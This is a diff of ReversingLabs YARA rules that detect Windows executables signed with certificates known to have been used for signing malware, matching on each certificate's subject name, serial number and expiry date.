+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L423-L439"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9655,21 +34320,21 @@ rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and ( pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures [ i ] . serial == "8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" ) and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S2BVISIO BELGIQUE SA" and pe.signatures [ i ] . serial == "55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c83918d8-fe90-59dc-8f4e-0e7b10238780"
+		id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7444-L7462"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L441-L457"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9679,21 +34344,21 @@ rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and ( pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures [ i ] . serial == "b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" ) and 1614556800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Porral Twinware S.L.L." and pe.signatures [ i ] . serial == "09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4"
+		id = "4fb06917-ccbd-514c-a936-e337c31c6e65"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7464-L7482"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L459-L475"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9703,21 +34368,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and ( pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures [ i ] . serial == "fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" ) and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "I.ST.SAN. Srl" and pe.signatures [ i ] . serial == "0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24"
+		id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7484-L7502"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L477-L493"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9727,21 +34392,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecno trade d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures [ i ] . serial == "aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" ) and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PlanView, Inc." and pe.signatures [ i ] . serial == "1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "300d9e11-9283-500e-9716-5b628ef41853"
+		id = "40aed582-2960-5b42-acde-7350a2595b4b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7504-L7520"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L495-L511"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9751,21 +34416,21 @@ rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures [ i ] . serial == "4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7894a48-459b-574f-9df3-8505578de42b"
+		id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7522-L7538"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L513-L529"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9775,21 +34440,21 @@ rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28"
+		id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7540-L7558"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L531-L547"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9799,21 +34464,21 @@ rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and ( pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures [ i ] . serial == "d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karim Lammali" and pe.signatures [ i ] . serial == "06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "36b12300-6535-5644-9145-9f532b49a421"
+		id = "b4a56bbe-f2ba-52df-832d-35b92ab73683"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7560-L7578"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L549-L565"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9823,21 +34488,21 @@ rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and ( pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures [ i ] . serial == "d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" ) and 1613001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PS Partnership" and pe.signatures [ i ] . serial == "04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "362a6eb7-f49e-502b-9870-522aea13e04b"
+		id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7580-L7596"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L567-L583"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9847,21 +34512,21 @@ rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "The Motivo Group, Inc." and pe.signatures [ i ] . serial == "0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0d0a58a4-353d-51f9-a739-a135d77357c9"
+		id = "dbe2a945-cf13-564a-a95a-24534c70a723"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7598-L7614"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L585-L601"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9871,21 +34536,21 @@ rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "yinsheng xie" and pe.signatures [ i ] . serial == "42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "962c3096-2c3d-5137-9637-b45d00b2ee9b"
+		id = "18787692-1233-5ea8-869c-feb530d06237"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7616-L7632"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L603-L619"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9895,21 +34560,21 @@ rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Paper Comercial Ltda" and pe.signatures [ i ] . serial == "07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38"
+		id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7634-L7650"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L621-L637"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9919,21 +34584,21 @@ rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOX Entertainment Co., Ltd" and pe.signatures [ i ] . serial == "4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127"
+		id = "43cce248-2322-5607-8706-aeab046a30b9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7652-L7668"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L639-L655"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9943,21 +34608,21 @@ rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures [ i ] . serial == "30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures [ i ] . serial == "0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460"
+		id = "343e4dbe-21a6-5758-be81-e5e7918c54fa"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7670-L7688"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421"
